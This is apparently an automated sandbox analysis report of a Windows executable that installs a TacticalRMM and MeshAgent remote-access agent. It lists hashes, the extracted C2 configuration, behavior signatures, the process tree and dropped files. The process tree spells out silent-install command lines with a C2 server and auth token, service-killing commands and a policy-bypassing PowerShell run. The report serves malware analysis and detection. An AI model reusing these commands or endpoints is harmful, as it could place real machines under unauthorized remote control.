Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    135s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    18/01/2025, 00:53

General

  • Target

    2025-01-18_8c39f7b61f6b3cff72cd07c1dd90fbad_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe

  • Size

    5.0MB

  • MD5

    8c39f7b61f6b3cff72cd07c1dd90fbad

  • SHA1

    4b1e80bb562ceab0dab23601e4159c861d32331e

  • SHA256

    adf8dd8a9c80862cfc7bea25e10111d38b7d5c3cc1f10acc60bcfaa4a7db8290

  • SHA512

    47723b7bff41cd690374aa3e168cf10e1f2310250db4a507698397cfc4da4c8312e72041adca48190027ea0dcf1480d82922167e1d37513747fec36dd21568fe

  • SSDEEP

    49152:Kkk1lQkvWuVMrb/TcvO90d7HjmAFd4A64nsfJW5B270PGUJ+GSZ05UU4SVaDs1CW:tkvWuVrfz+ZUfVaA6El+erV

Malware Config

Extracted

Family

meshagent

Version

2

Botnet

TacticalRMM

C2

http://mesh.ztn.app:443/agent.ashx

Attributes
  • mesh_id

    0x1AC5A427D36E6A21D10128F481F9AC5A8DA677889ACD69D474A4B30819BCBFF7B979A19A780A3C6E50E3CD3AE57878ED

  • server_id

    58BA8120DEF0E4E89076972F82774D385B0F397F68F98E8BF0EF8B2C63F080982D35511B9CE190622EC6A4316C9AF531

  • wss

    wss://mesh.ztn.app:443/agent.ashx

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Blocklisted process makes network request 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 6 IoCs
  • Drops file in Program Files directory 20 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-01-18_8c39f7b61f6b3cff72cd07c1dd90fbad_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-01-18_8c39f7b61f6b3cff72cd07c1dd90fbad_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
      C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2976
      • C:\Users\Admin\AppData\Local\Temp\is-FS67U.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-FS67U.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$70196,3660179,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2732
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2580
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2688
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrpc
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2556
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrpc
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2564
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net stop tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2572
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalagent
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2672
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalagent
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3064
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:3060
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2184
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1204
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1592
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2924
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM tacticalrmm.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1980
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          PID:792
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalagent
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2188
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2252
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalrpc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2648
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c tacticalrmm.exe -m installsvc
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1492
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            tacticalrmm.exe -m installsvc
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2620
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net start tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          PID:832
          • C:\Windows\SysWOW64\net.exe
            net start tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2376
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2440
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.ztn.app --client-id 14 --site-id 37 --agent-type workstation --auth c52763ea5e8516c687c06875af1bd779e47c159661b3df56cdcc3c1a649244f4
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2384
      • C:\Program Files\TacticalAgent\meshagent.exe
        "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
        3⤵
        • Sets service image path in registry
        • Executes dropped EXE
        • Drops file in Program Files directory
        PID:2436
      • C:\Program Files\Mesh Agent\MeshAgent.exe
        "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
        3⤵
        • Executes dropped EXE
        PID:340
  • C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe"
    1⤵
    • Executes dropped EXE
    • Drops file in Program Files directory
    • Modifies data under HKEY_USERS
    PID:1976
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1628
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:524
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1988
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
        PID:1984
      • C:\Windows\System32\wbem\wmic.exe
        wmic SystemEnclosure get ChassisTypes
        2⤵
          PID:1400
        • C:\Windows\System32\wbem\wmic.exe
          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
          2⤵
            PID:2512
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in Program Files directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2424
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in Program Files directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:1612
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in Program Files directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2564
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in Program Files directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2596
        • C:\Program Files\TacticalAgent\tacticalrmm.exe
          "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
          1⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:1352
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m checkrunner
            2⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2616
          • C:\Program Files\Mesh Agent\MeshAgent.exe
            "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
            2⤵
            • Executes dropped EXE
            PID:1128
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass C:\ProgramData\TacticalRMM\1113272193.ps1
            2⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2756

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Mesh Agent\MeshAgent.db

          Filesize

          153KB

          MD5

          94fb8df669c293b03fd021c1fd0f9c7d

          SHA1

          4a4b65e1b6ddc0eb3a6d46bfba37e0ed3b83f2c3

          SHA256

          e37ab29c8807ab7a1db4cfe50ef4e91e7dc81ce7f5d32cb62acceb7af6bfcaeb

          SHA512

          4a969a57094594d1f45edcca648bd375ac1d76b98c17df3fa7d36c968eb1cce92b3636a9b8ffbbcc47d5dcbbcbfe38a5c430591f137dcc60768f01d879a57784

        • C:\Program Files\Mesh Agent\MeshAgent.db

          Filesize

          35KB

          MD5

          88ae4467c04ac1dfd17db617d794d186

          SHA1

          c5c3b638160e5b908c3843c5623fe6b5249bfb46

          SHA256

          c193414a9a1d13af83e6f1c0572c3f3f41f2afa6bdebaec2e32cd8cb320e0393

          SHA512

          9a6ba1fd6ba3645c57787aa8d354d6d2fdef7e0fc51dbd55b9897f73d769b71661e1ebb06cb29988657ed1b11fa546f079e055a8c27db01b3f6d431203317bff

        • C:\Program Files\TacticalAgent\agent.log

          Filesize

          67B

          MD5

          ef96c4f08a695a18c73a2fe123ebda6d

          SHA1

          25bdc58ef2f5aa83adfa99dbe36550fed1059311

          SHA256

          dab700c8e4e2c954eef4098ca1757425f4d9d7bb0cd87266c2ec2e55dd5d9c96

          SHA512

          59b425b00f329b664d7cb4f3bffff67b5a7622085303bbb95a37fe516895555747efc8bc9e172772f1bbe623a563d9d25f9bdfb589140383cc73a5e4e821fa51

        • C:\ProgramData\TacticalRMM\1113272193.ps1

          Filesize

          35KB

          MD5

          e9fb33c49bee675e226d1afeef2740d9

          SHA1

          ded4e30152638c4e53db4c3c62a76fe0b69e60ab

          SHA256

          44e045ed5350758616d664c5af631e7f2cd10165f5bf2bd82cbf3a0bb8f63462

          SHA512

          2661a981d48d58c9ceb1992e55061ce07af0d53b5f38b07de620376e0ea1d876c7e50965e67aee80fe723968bdb956dc7fd93e7923608534c8fb4d21739dbc48

        • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe

          Filesize

          4.3MB

          MD5

          2f046950e65922336cd83bf0dbc9de33

          SHA1

          ddc64a8b21c8146c93c0b19c1eeb0ef784b980c6

          SHA256

          412e1f600251b21911c582e69381f677e663231f5e1d10786d88a026e00ea811

          SHA512

          a11cbf8b8b692d2d5a0e3af5a97f91a3d1f3e7aa39966eb7d62b3244b3913f2fdc21823d5c94de0d98e579f801709df44433af91567356361d5d9699a93b2cbc

        • C:\Users\Admin\AppData\Local\Temp\is-FS67U.tmp\tacticalagent-v2.8.0-windows-amd64.tmp

          Filesize

          3.0MB

          MD5

          a639312111d278fee4f70299c134d620

          SHA1

          6144ca6e18a5444cdb9b633a6efee67aff931115

          SHA256

          4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df

          SHA512

          f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

          Filesize

          914B

          MD5

          e4a68ac854ac5242460afd72481b2a44

          SHA1

          df3c24f9bfd666761b268073fe06d1cc8d4f82a4

          SHA256

          cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

          SHA512

          5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          1KB

          MD5

          a266bb7dcc38a562631361bbf61dd11b

          SHA1

          3b1efd3a66ea28b16697394703a72ca340a05bd5

          SHA256

          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

          SHA512

          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

          Filesize

          252B

          MD5

          496debaf7a97ecebb424b2acabd0466d

          SHA1

          9b7fc565dcc9db28104996a26a414ef4935ce51f

          SHA256

          7d0c310911b241b3cc845283f395a4c50d07a727956cc26eb89c999bd48cb6ae

          SHA512

          ae6dc2a29c6cffe9b81da53ab28121a994e20b5907d8103414724238391a8e9e56f2228510a7499b5998f74d4dea5f8016ef6c61fa199c25fa942efc46f7890d

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          13769bddad69aa70dfb8ad9c89d6b75c

          SHA1

          6ac5ba67d1f685f415a2a2e4d4adbecd1c739864

          SHA256

          1e631d49cccb47e30a2a956815432c7807b8308c804c84e00868e37d6b688325

          SHA512

          074c98cc1f6c1afd7d6f60cfa3738344bf502aec9e3427be5f3496c015fd81c318867e2081393fe509238fe75a89596c9db79f2c5dd68fc9e3baf667299d6d71

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          242B

          MD5

          a4199933e32f2eca1ef55379c830e6c2

          SHA1

          d07fca7b332ac6d977400c4cd1e8212a61468d5b

          SHA256

          20c6b86272a2c2452693b20e4d7e45b7d16c6b0b635f5d7f7943bd4829db9532

          SHA512

          08c82bd3c5fe7294103433d065a407391e62d86ae9f107bb610693551244134dd551f1c9558b05a9db4f38de81528e84e0fd5958acba06fe11991bac03200f3a

        • C:\Windows\Temp\CabFF67.tmp

          Filesize

          29KB

          MD5

          d59a6b36c5a94916241a3ead50222b6f

          SHA1

          e274e9486d318c383bc4b9812844ba56f0cff3c6

          SHA256

          a38d01d3f024e626d579cf052ac3bd4260bb00c34bc6085977a5f4135ab09b53

          SHA512

          17012307955fef045e7c13bf0613bd40df27c29778ba6572640b76c18d379e02dc478e855c9276737363d0ad09b9a94f2adaa85da9c77ebb3c2d427aa68e2489

        • C:\Windows\Temp\TarA6.tmp

          Filesize

          181KB

          MD5

          4ea6026cf93ec6338144661bf1202cd1

          SHA1

          a1dec9044f750ad887935a01430bf49322fbdcb7

          SHA256

          8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

          SHA512

          6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

        • \Program Files\TacticalAgent\meshagent.exe

          Filesize

          3.3MB

          MD5

          e5d7d294c417575310a4472580a16257

          SHA1

          66be889ae2caeb288e81b4693087a38d7af14a03

          SHA256

          fd0cf4ace405f05f67784eea2dc9dada61d6ba16ff94165d9a9865c1b4745dbb

          SHA512

          c4dcb8b24592843e51ba9cd74ea0874a8aafeba255dad34d94399683f2fd56858388e39255c478a981ba5537ebf7e54000a4ea4ab862289efc0eab9de2683fc6

        • \Program Files\TacticalAgent\tacticalrmm.exe

          Filesize

          9.2MB

          MD5

          bb383b7c3d5e4acb1001ab099b5b0f3c

          SHA1

          cb0c85f84a454aa4b1aab02bfba47c4355c2311e

          SHA256

          a6d3159c858aa3704f35d69b27829618ad0d1bae894c848a5233100c17464f95

          SHA512

          157dda96d1cacea55a6be27b9d432225b47d7334e664e577cef82a14c7eb1be1b8b84423b3905a4c1caecb5394be264d9b5c3e32109a4893e51a9d406ce740be

        • memory/1352-115-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1352-348-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1352-347-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1352-288-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1352-287-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1352-170-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1352-119-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1352-116-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1612-95-0x0000000002060000-0x0000000002068000-memory.dmp

          Filesize

          32KB

        • memory/1612-94-0x000000001B440000-0x000000001B722000-memory.dmp

          Filesize

          2.9MB

        • memory/2384-110-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2384-109-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2384-112-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2384-111-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2384-107-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2384-45-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2384-34-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2384-108-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2384-32-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2384-96-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2384-93-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2384-113-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2424-83-0x000000001B320000-0x000000001B602000-memory.dmp

          Filesize

          2.9MB

        • memory/2424-84-0x0000000001CB0000-0x0000000001CB8000-memory.dmp

          Filesize

          32KB

        • memory/2620-25-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2620-24-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2732-14-0x0000000000400000-0x0000000000712000-memory.dmp

          Filesize

          3.1MB

        • memory/2732-28-0x0000000000400000-0x0000000000712000-memory.dmp

          Filesize

          3.1MB

        • memory/2976-29-0x0000000000400000-0x00000000004D7000-memory.dmp

          Filesize

          860KB

        • memory/2976-4-0x0000000000400000-0x00000000004D7000-memory.dmp

          Filesize

          860KB

        • memory/2976-7-0x0000000000401000-0x00000000004B7000-memory.dmp

          Filesize

          728KB